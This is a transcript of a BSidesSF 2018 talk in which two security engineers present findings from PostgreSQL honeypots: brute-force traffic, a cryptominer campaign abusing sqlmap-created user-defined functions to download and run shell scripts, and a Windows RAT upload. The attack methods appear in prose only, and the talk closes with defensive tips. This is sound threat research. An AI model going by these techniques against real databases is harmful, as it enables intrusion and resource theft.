← All talks

BSidesSF 2018 - PostgreSQL Threats and Attacks in the Wild (AJ Bahnken • Forrest Fleming)

BSidesSF · 201821:52111 viewsPublished 2018-04Watch on YouTube ↗
Speakers
Tags
CategoryTechnical
StyleTalk
About this talk
AJ Bahnken • Forrest Fleming - PostgreSQL Threats and Attacks in the Wild We developed two PostgreSQL honeypots, pghoney (low-interaction) and Sticky Elephant (medium-interaction). This talk presents our findings (exploits! malware! brute force!) to the security community. We will also discuss the development of our honeypots and their integration into MHN & HPFeeds.
Show transcript [en]

[Music]

hey everyone so yeah this is PostgreSQL threats and attacks in the wild quick intros hi I am AJ bunkin I'm a security engineer at Mozilla I'm Forrest Fleming and I'm a senior security engineer at procore technologies today we're gonna be talking about two honey pots that AJ and I wrote to emulate PostgreSQL we deployed them to a different you know a few different servers around the nation really and this talk is really to prevent our present our findings from those deployments just a quick note these were research deployments not Alert deployments right so we were using this to gather threat intelligence about attacks that are happening in the wild as opposed to putting them in a network

to see if there's a rogue actor that's trying to hit our threat or hit our honey pot and then alerting on that yeah and so we want to do before we get started just a quick introduction to honey pots in case anyone in the audience isn't familiar so generally a honey pot is a purposely vulnerable system made purposely vulnerable so that it can attract attackers either for threat research or generally as we do or doing or as forrest was mentioning something like internal and your internal network to notify you if there's attackers that echoes and in the context that we're going to be talking about of purposely vulnerable networked service there's main three types low

interaction medium interaction and high interaction so low and medium are fairly similar and that they are a separate piece of software made to mimic something so in this context it will be Postgres server but it's not actually a Postgres server just made to look like that and we'll get into the differences between low and medium in a second and the high interaction is typically like actually running a purposely vulnerable version of Postgres sandbox in whatever way you want to do that and we put these slides up on sketched and there's a link at the end of the slides but if you're all interested in learning more about honey pots I highly recommend the book virtual honey pots and the honey net

project is an awesome project with tons and tons of awesome resources on their website and then awesome honey pots just has a you know a huge link dump tons of cool open-source honey pots and similar related software so the honeypot that I wrote is called sticky elephant and it was inspired by capo and calorie if you're not familiar with them calorie is a fork of capo and both are essentially Python packages Python scripts that work to emulate a SSH daemon server and to give you a bash prompt when you log in and they go a pretty far away to actually deceiving the person that logs in they have a lot of really cool functionality that makes

it look at least for the first you know a few minutes that you're really on an actual bash terminal and not you know inside a Python program doing that emulation is what's known as being medium interaction so it's not the high interaction where you have an actual thing it's not not quite the low interaction that we'll talk about in a minute but it's doing some semblance sticky elephant is not as advanced as the capo and calorie projects are mostly it lets you log in give to your piece equal prompt and pretty much anything that you throw at it it's going to give you back the same query results it's just hard coded into the application so

this lets us sort of fool automated attackers even though it wouldn't fool an actual human on the keyboard so they don't get any errors from their scripts nothing's going wrong from an automated standpoint so we get to see what sort of things are being run when they log it and I wrote this in Ruby you can see the github lower could be the root has our stuff and I deployed this just a cox cable internet home connection and in AWS and then PG honey which is when I wrote it's inspired by elastic honey and elastic honey is a small little elasticsearch honeypot that just has static you know hard coded responses to some of the common elasticsearch api

calls and it's not quite that instead it just mimics the Postgres authentication flow and how it works is as an operator when you deploy PG honey you define a list of user names that you know quote-unquote exist and the Postgres authentication flow is that you tell Postgres hey i want to login with this username to this database and some other stuff you know if that username exists it'll say okay give me the password if there's a password required or whatever and so this does the same thing where when you say i want to login with this username if the usernames in the config file then it will say they'll ask for the password I will sit I'll just say you know you

know that username does not exist and it's written and go you can find the code there we'll have links for to the github org at the end as well and deployed an in digital ocean and AWS before we get started with the actual findings do you want to throw some shoutouts to the PostgreSQL documentation crew there Doc's are amazing both are actually implementing the auth flow that AJ and I you know both did in separate languages as well as just having tons of information about the wire protocol that sort of once you get over the a pretty pretty shallow initial learning curve of just navigating the docs there is so much information and it's so easy to begin to

hack in support for a new new type of query I also want to shout out Jana Bansky I gave a PPG con talk called Postgres on the wire the slides are tremendously helpful for both AJ and I and I wanted the note that when we initially wrote these honey pots we were planning on deploying them as part of the mhn modern honeynet project as time went on we decided the actual operational overhead of running an mhn instance the full sort of full bore thing was really more than we wanted to do for something that was really supposed to be you know you set up a collector you wait several months you know maybe check on it in the

interim but without needing a lot of operator interaction so there there is HP feeds integration which is what mhn uses for its efforts logging you can feel free to connect them to to image in on your own we have some PRS into the imagine project that we'll be opening up fairly soon for that but it's not what we actually used for our collections suite so let's get into the exciting part the findings so first off wanted to start with some kind of high-level demographics about stuff that we saw this is a number of unique IPS by country you know and it's fairly fairly typical us boxes are at the very top right below is trying to make sense and

then as well the top 10s ends by unique IP and so LeaseWeb Netherlands and being at the top they have boxes all throughout the European Union so it's right Netherlands wasn't towards the top but box throughout the EU and then as well we'll be talking about some of these cific hosting providers but these were the location of actual attackers that we got so the first attacks are on brute-force attacks so that's pretty much exclusively what I got was PG honey one of the kind of the like the dream goal of it was to hopefully capture some interesting attack on the authentication flow for Postgres I didn't get anything like that instead the most interesting stuff I got was a brute forcing and you

know almost all the brute forcing traffic was from China France or Turkey and something interesting that I wanted to mention was that for all of the Chinese IPS that were doing brute forcing I would see scanning traffic from the exact same Class C about one to two days before something on the same Class C something that would actually do a brute force at that and is well round you know as you'd expect around 95% of the passwords were either found in Sec lists or were very obviously dictionary based right like common transformations on the word password or administrator and we will be opening a PR into cyclists for the around 200 passwords not found and see if it's something that

they find potentially useful or interesting and as part of that 200 passwords that were not in cyclists are obviously dictionary based something that was interesting is running all these passwords through a complexity score zero being the least complex for being that most the around 200 or so passwords most of them were in the three or four most of the more Chinese words and some we're not but that found that fairly interesting and as well something to just mention in regards to PG honey around the brute-forcing stuff is to allow for this kind of well to make it much easier to analyze the actual passwords coming in Postgres has a way to say hey give me the password

it's from the client in clear-text rather than an md5 is the most common and so it is a very easy fingerprinting Oh way to fingerprint PG honey at the moment where if it's the servers asking for something in the password in clear text like that's not a very common thing so behavior on logon if we just record the login flow in the authy we had a lot of really cool information about brute-force attacks as aj was talking about what if we let them actually have a piece equal prompt and start running queries what we get are a lot of robots we actually saw zero manual interaction in our PG honey instances RPG honey and sticky elephant deploys a lot of bot

traffic we did see a malware upload that we'll talk about in a little bit but before that I want to talk about this sort of group of individuals that really really really wanted to mine Manero using our compute resources and this is pretty cool because we got to watch the evolution of a particular attack group over the course of about nine months now as you can see here they start out doing pretty basic bog-standard stuff it's just a call to SS eval nine nine nine that's a user-defined function dropped by sequel map so superscript Katie they're relying on a previously exploited box just hanging out on the internet and they're trying to log in use that function that was part of the

exploit and download of stage two they grabbed the stage two what that is is just a shell archive that doesn't do much interesting what it does is it kills a bunch of other monaro miners that could potentially be on the box and then it installs its own Manero miner and we're off to the races kind of interesting that they run the minor under temp sshd so they are trying to pretend to be an SSH daemon but it's not a particularly well thought out or deep deeply deceitful obfuscation attempt there we saw these this attacks started on March third of last year and stayed doing basically the exact same thing with different IPS up until April 11

second verse same as the first a little bit different not any much worse actually it's almost the exact same thing right sis Sun instead of sis eval nine nine nine but that's the same sort of thing sequel map user defined function exploit drops it in there sort of default type thing and they're still relying on the previously exploited machine we saw this starting on April 15th these tax servers they start coming from wholesale Internet where they were almost exclusively coming from lie node before the distribution servers are still pretty much exclusively on line ode you'll notice a little bit of sophistication in the attacker is now grabbing different scripts right that's a different stage to up there but it's really nice for us

trying to sort of connect the dots of these attackers to make sure they really are the same person or the same group and not just somebody that you know bought the script on ecstatic or something but luckily when they switch the script the script name the stage to name they do it on the same distribution server and then they'll switch distribution servers using the new script a little bit later and they just do that and we have a really nice clear path through the logs saying hey these are the same folks when we do cut from sis eval desist son we start grabbing in pool sh from the same distro servers April 17th we start grabbing PG pool sh

and we do that for a while good good SH happens on May 3rd but still the same sort of clear chain going around we do a cut from good Sh to something a little more advanced FR dot sh e u sh us a dot sh and you're like oh wow they're doing geographic fingerprinting this is the next step No ah they weren't actually doing any checking on anything they were grabbing all three of those scripts and running them in sequence your guess I think is probably as good as mine that started on May 7th and around that time they started doing a drop function on the system function so I think that's probably to prevent themselves from

reinfecting the same machine wasting resources on owning the same machine over and over and over it could also be evidence of other threats out there that might want to sort of take over the same territory at the end of them at the end of the month of May they get a little bit I don't know if more sophisticated is the right phrase more brazen they register Postgres dot TK and start using that instead of raw IPS for their distribution servers I imagine they hadn't seen too much resistance Ajay and I shut down a few attack servers a few distro servers you know just emailing lai node and being like hey got some stuff going on here and they came up

within 24-48 hours again from a different IP so we stopped playing whack-a-mole there they'll really stay post-grad Tek doing the same sort of thing until the next big move and the next big move well is this its we start seeing concurrently with the sis own attacks some scanning traffic coming from Chinese telecoms so the user logs in they check the PG large object store they check the version of the database and they attempt to drop a particular object ID out of the large object store and it's not a lot of different IDs at once so we'd see one ID for a week or two another ID for a week or two and at the end we settled really on one ID that

lasted for quite some time and this continues all the way from basically May until August 4th which is when the Syst son attacks completely halt about three weeks after that we start seeing this guy which is same sort of thing right it's a user defined function that's being used to run shell code shell code in the sense of bash scripts not in the other sense it's doing the same sort of thing but we never actually saw this function being created and note the file name are there it's s and some digits those digits are the large object ID that was actually being dropped in the previous scanning traffic that we saw and had been seeing for some time this

would be pretty mysterious if it weren't for the folks at impaired of a security that did some really great research and we're tracking these folks concurrent with us um that mineiro address that you see there is the same one that this article heard this write-up that they published in March of this year was finding so they filled in a lot of the blind spots that we had when it comes to the actual exploitation of the machine that is putting the the fun 8 100 170 function onto the machine and how they were distributing it in this stage of the operation it was actually a picture of Scarlett Johansson that was put on a public image host and then the X binary

was pulled out of that you run the X binary that drops the S binary the S binary is actually the miner and that gets run to do crypto stuff I really encourage you all to read this and our hats off to these folks for really being able to provide the final piece of the most advanced pose for this crew that we were tracking for almost a year really great work so we have the Cissy Val and the sis son crew and they were pretty well connected we know that they're the same crew pretty much both you know using post-credit to UK at the end that's pretty obvious and there's the function call crew a little bit of geographic

shifting right instead of line those servers out of the u.s. almost all of the attack traffic was coming from China can we really say that those are the two or that those two attacks are coming from the same group I think we can first of all is the fact there was no no exploit kit or distribution attack or distribution contact for what I'm calling the function call folks the fund 8 101 70 guys so that's sort of interesting right because it tells me that they were probably relying on some sort of previous exploitation they were relying on that function being created at some point in a previous process that it occurred and well what was that well

they knew that quote-unquote that we were vulnerable from the SIS Sun and the Cissy Val phases also look at the timestamps of the attacks there's no overlap whatsoever between the this is Sun call and the phone eight 101 70 call there's about three weeks where neither of those are happening and if it were two separate groups I would expect there to be some overlap there would be some evidence that they're trying to take over the same machine there's some kind of struggle going on there we didn't see that whatsoever and third is just a similarity of tools so they were both using yam yet another miner same arguments they're using the same crypto mining pool at crypto pool are of course

none of that is conclusive right this is circumstantial evidence they're the same but we do think the preponderance of evidence points them being the same group and since this is us trying to connect the dots of a fairly interesting to my mind attack group and not a court of law I'm pretty comfortable saying these are the same folks I mentioned malware storage you might be thinking oh yes they were putting something in PG large object this was the single call we got to the PG large object store to land something and it would make tons of sense if this were a Manero miner it wasn't it was a Windows rat and it came from a Brazilian IP and was the only

Brazilian traffic we got so well it you know could conceptually be be part of that campaign it seems really unlikely to us we're pretty sure it was just a one-off and it was really exciting when you know the basics before it came through and like oh you know let's open that up see what it is but it wasn't anything particularly groundbreaking so we wanted to kind of before we conclude just have a quick slide on defense tips from doing this work and I mean the top part is really you know it's in some ences funny but I think it's still probably important to mention then the last write like don't expose your post-grad server to the

Internet use good passwords and don't run post crisis route right and if you're installing posters from almost any PAC word any package manager it'll set up a Postgres user and do all that for you from all the awesome stuff that for us was just talking about restricting creation of user-defined functions is a good idea if you can get away with completely removing that functionality from your Postgres users that's awesome else a common thing I've seen is the separation of like a post rest user that your app actually uses and then one that can do migrations I can create those user-defined functions also it's important I think to remember that Postgres usernames are innumerable and if you want to learn more about kind

of the blue team side of Postgres did we link to these this slide deck from Christophe Pettis at PG experts who did an awesome talk on securing Postgres big you know kind of in-depth look at Postgres as well as at the host for running your postcard server and so to conclude what's next for this I guess there's really just two pieces the first one is you know we started to talk a little bit about fingerprinting concerns and there's some cool stuff that we could do and are interested in doing around further fingerprint mitigation if you look at kippo and cowering some more it you know advance or more worked on honey pots they have tons and tons of

stuff to deal with this issue and as well information sharing so we're not gonna commit to releasing some big public disclosure of all the logs or anything but if you're at all interested in talking to us about this you know or getting some of the logs or any of that stuff like please come and talk to us or email us or anything I promise we're very nice yeah and yeah that's pretty much it thank you guys thanks al were honored to be here yeah I don't know if we have time for questions I think Seattle oh what's up Sam so to repeat the question the the question nation I understand was did I see any drop-off from somebody who

like got the response and said no I don't want to give you a password and Clair text yeah I did not what I saw mostly was either full brute forces you know where there was like hundreds and hundreds of attempts or like five to eight attempts which I think that I don't know what to make of that but they just tried a couple passwords in a couple usernames and then went on so I hadn't seen that yet but I mentioned well and especially now that these are open-source now cuz they weren't originally yeah they'll probably be fingerprinted immediately thank you all so much [Applause]